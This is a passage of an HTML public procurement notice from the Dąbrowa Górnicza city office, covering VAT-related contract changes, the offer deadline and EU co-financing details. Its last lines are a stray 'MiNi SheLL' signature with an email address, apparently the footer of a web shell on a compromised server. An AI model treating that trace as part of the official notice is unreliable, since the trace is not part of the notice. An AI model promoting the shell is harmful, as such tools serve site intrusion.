c/  zmiany stawki podatku VAT :
- w przypadku zwiększenia stawki podatku VAT -  wartość wynagrodzenia brutto nie ulegnie zmianie w okresie obowiązywania umowy
- w przypadku zmniejszenia stawki podatku VAT -  wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT.
2. W przypadku wystąpienia okoliczności wymienionych wyżej strony poinformują się natychmiast o ich zaistnieniu.
3. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół 	podpisany  przez obie strony oraz aneks do umowy.
4. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest  dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, adres: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, II piętro, pok. nr 222, Wydział Inwestycji Miejskich..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 09:30, miejsce: Siedziba Zamawiającego, adres: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, II piętro, pok. nr 222, Wydział Inwestycji Miejskich..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Poddziałania 6.2.2. Programu Operacyjnego Innowacyjna Gospodarka 2007-2013.
2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
3. Doprecyzowanie do Sekcji II. pkt 2) ogłoszenia -CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA: 
Termin rozpoczęcia realizacji zadania - od dnia podpisania umowy
Termin zakończenia realizacji zadania - zadanie I- do 22.01.2013 r.
                                                   - zadanie II- do 22.01.2013 r.
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
4.1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
4.2.	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.2. SIWZ przez każdego z nich.
4.3.	Dokumenty i oświadczenia wymienione w pkt. 9.3. SIWZ Wykonawcy składają wspólnie. Oświadczenie wymienione w pkt. 9.1.1. SIWZ, Formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ oraz winny być podpisane przez uprawnionych przedstawicieli Wykonawców.
4.4.	Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
4.5.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com